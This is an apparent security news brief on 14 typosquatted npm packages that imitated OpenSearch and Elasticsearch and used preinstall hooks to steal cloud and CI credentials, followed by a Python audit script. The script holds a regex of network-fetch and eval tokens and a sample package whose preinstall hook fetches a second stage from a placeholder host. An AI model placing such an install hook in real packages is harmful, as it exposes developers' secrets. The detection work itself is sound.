A single attacker published 14 malicious npm packages that pretended to be OpenSearch, Elasticsearch, and related developer tools, putting developers and build systems at risk of secret theft. Microsoft said the packages were uploaded under the alias "vpmdhaj" and used typosquatting, spoofed metadata, and inflated version numbers; on install, preinstall hooks fetched a second-stage credential harvester targeting Amazon Web Services, HashiCorp Vault, GitHub Actions, and npm tokens. The packages were removed after publication.
Why it matters: Anyone who installed or built these packages may have exposed credentials that can be reused to access cloud accounts, code pipelines, and package publishing systems. Organizations should identify affected installs from May 28 onward, rotate AWS Identity and Access Management or Security Token Service credentials, Vault tokens, npm publish tokens, and GitHub Actions secrets, and review for follow-on compromise.
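The response steps above (find installs that carry install-time hooks, spot look-alike names, notice inflated versions) can be scripted against a local `node_modules` tree. The following is an added example, not code from Microsoft or from the article: it walks a tree of `package.json` files, flags lifecycle hooks that fetch or evaluate code at install time, flags names within a small edit distance of watched names, and flags implausibly high major versions. The watched-name list, the edit-distance cutoff, the version threshold and the two sample packages are all constructed assumptions for illustration.

```python
"""Audit a node_modules tree for install-time hooks that fetch or run remote
code, typosquat-like names, and inflated version numbers (added example)."""
import json
import os
import re
import tempfile

# npm runs these scripts automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Hook commands containing these tokens download or evaluate code at install time.
NETWORK_OR_EVAL = re.compile(
    r"(curl|wget|fetch\(|https?://|node\s+-e|eval\(|child_process|base64)",
    re.IGNORECASE,
)

# Assumed: legitimate package names the campaign imitated; extend as needed.
WATCHED_NAMES = {"opensearch", "elasticsearch"}
MAX_EDIT_DISTANCE = 2   # assumed cutoff for "looks like a typo of"
INFLATED_MAJOR = 50     # assumed threshold for an implausible major version


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_package(pkg):
    """Return a list of human-readable findings for one parsed package.json."""
    findings = []
    name = pkg.get("name", "<unnamed>")
    scripts = pkg.get("scripts") or {}

    # 1. Install-time hooks that reach out to the network or eval code.
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd and NETWORK_OR_EVAL.search(cmd):
            findings.append(f"{name}: {hook} hook fetches/executes code: {cmd!r}")

    # 2. Name within a small edit distance of a watched name (scope stripped).
    bare = name.split("/")[-1].lower()
    for legit in WATCHED_NAMES:
        dist = levenshtein(bare, legit)
        if 0 < dist <= MAX_EDIT_DISTANCE:
            findings.append(f"{name}: name is within edit distance {dist} of {legit!r}")

    # 3. Inflated major version (a trick to win dependency resolution).
    try:
        major = int(str(pkg.get("version", "0")).split(".")[0])
    except ValueError:
        major = 0
    if major >= INFLATED_MAJOR:
        findings.append(f"{name}: implausible major version {major}")

    return findings


def scan_tree(root):
    """Walk `root`, parse every package.json, and collect findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                findings.extend(audit_package(json.load(fh)))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash
    return findings


# Constructed sample manifests (not real packages); the URL is a placeholder.
SUSPICIOUS_PKG = {
    "name": "opensaerch",
    "version": "99.0.1",
    "scripts": {"preinstall": "node -e \"require('https').get('https://example.invalid/stage2')\""},
}
BENIGN_PKG = {"name": "left-pad", "version": "1.3.0", "scripts": {"test": "node test.js"}}


def demo():
    """Write the two samples into a throwaway node_modules tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for pkg in (SUSPICIOUS_PKG, BENIGN_PKG):
            pkg_dir = os.path.join(tmp, "node_modules", pkg["name"])
            os.makedirs(pkg_dir)
            with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
                json.dump(pkg, fh)
        return scan_tree(tmp)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it with `python audit_npm_tree.py` against a real project by replacing `demo()` with `scan_tree("./node_modules")`; any hit on the hook check is worth treating as a potential credential exposure and feeding into the rotation steps above. Pairing this with `ignore-scripts=true` in `.npmrc` for CI installs removes the preinstall execution path entirely.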
2026.05.29
This article establishes a distinct npm package supply-chain incident centered on 14 typosquatted packages targeting OpenSearch and Elasticsearch users, not one of the existing tracked package compromises.